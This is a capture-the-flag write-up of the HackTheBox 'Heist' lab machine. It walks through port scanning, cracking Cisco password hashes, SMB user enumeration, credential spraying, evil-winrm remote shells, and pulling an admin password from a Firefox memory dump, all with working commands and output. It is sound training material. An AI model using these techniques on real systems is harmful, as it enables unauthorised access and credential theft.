Heist - HackTheBox
Information gathering
Let's start with a port scan:
$ nmap -A -T4 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-30 14:36 EDT
Stats: 0:00:31 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.10.10.149
Host is up (0.20s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-10-30T18:37:11
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.67 seconds
As always, when there's a web server, that's the first thing that I look into,
and there's a login page:
Given that we can login as guest, let's do it:
It looks like someone needed help with the configuration of a Cisco router and asked for help, it looks like it's username is Hazard. Let's check the attachment:
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0 mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh
Straight off we have three passwords hashes. The secret 5 type can be cracked
with John the Ripper, so after writing it to a file, let's run john secret5 --wordlist=rockyou.txt. After a couple of seconds, we find out that the
password is stealth1agent.
The other two hashes can be decoded simply with an online tool, like this one, so here they are:
0242114B0E143F015F5D1E161713:$uperP@ssword
02375012182C1A1D751618034F36415408:Q4)sJu\Y8qz*A3?d
Further exploration
As we have a username and some passwords, we can try to authenticate to the smb
server:
$ smbclient -L \\\\10.10.10.149 -U 'hazard%stealth1agent'
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.149 failed (Error NT_STATUS_IO_TIMEOUT)
Failed to connect with SMB1 -- no workgroup available
Out of luck, because of the order that they are written in the file, the first one works!
We can use lookupsid from
impacket to enumerate users in the
Windows domain:
$ ./lookupsid.py 10.10.10.149/hazard:stealth1agent@10.10.10.149
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
Getting a shell
We can now try to login with all usernames and passwords combinations that
we've found. There's a handy metasploit module that can help us. After writing
all the users in a file called users and the passwords in pws, let's load the
module and set the options:
And let's run it with exploit:
Cool! We've found the passwords of Hazard and Chase! Now we can use evil-winrm
(install it with gem install --user evil-winrm) to check if one of the two
users is allowed to get a remote shell:
$ evil-winrm -u Hazard -p stealth1agent -i 10.10.10.149
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
No luck with Hazard, let's try with Chase:
$ evil-winrm -u Chase -p 'Q4)sJu\Y8qz*A3?d' -i 10.10.10.149
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents>
And we got a shell! Let's check the flag:
*Evil-WinRM* PS C:\Users\Chase\Desktop> Get-Acl user.txt
Directory: C:\Users\Chase\Desktop
Path Owner Access
---- ----- ------
user.txt SUPPORTDESK\Chase NT AUTHORITY\SYSTEM Allow FullControl...
Privilege escalation
Listing the files in the Desktop, there's a curious one:
PS > type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.
Following the usual enumeration techniques and listing the running processes
with Get-Process, reveals us that there are some instances of Firefox running,
which stands out among the others. The first thing that I did was to search in
the user AppData folder for Firefox data like bookmarks, visited URLs and
things like that, but I had no luck with it.
The next thing that came to my mind is to dump the processes memory with
Procdump.
After downloading it on our machine, and moving it in the same folder that we
launched evil-winrm from, we can upload it using it's upload command:
Now we can dump the Firefox process memory using the PID from the Get-Process
command:
Because I'm a PowerShell noob, I've downloaded the dump on my machine to
analyze it, with download firefox.exe_191129_053757.dmp and after (quite) a
bit of time I started searching for strings.
An interesting string to find in the memory dump would be password, so let's
search for it:
$ strings firefox.exe_191129_053757.dmp | grep -i password
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
Bingo! And we can get a shell with these credentials:
*Evil-WinRM* PS C:\Users\Administrator\Desktop> Get-Acl root.txt
Directory: C:\Users\Administrator\Desktop
Path Owner Access
---- ----- ------
root.txt BUILTIN\Administrators NT AUTHORITY\SYSTEM Allow FullControl...
And we have access to the root flag!
Wrapping up
I have to admit this one took me quite a bit of time, even though it was only 20
points, because I went down the AppData folder rabbit hole, and there were
some cache files and a password database that looked interesting. This is the
first time that I've analyzed a process' memory, which is an interesting
technique.
Thanks for reading!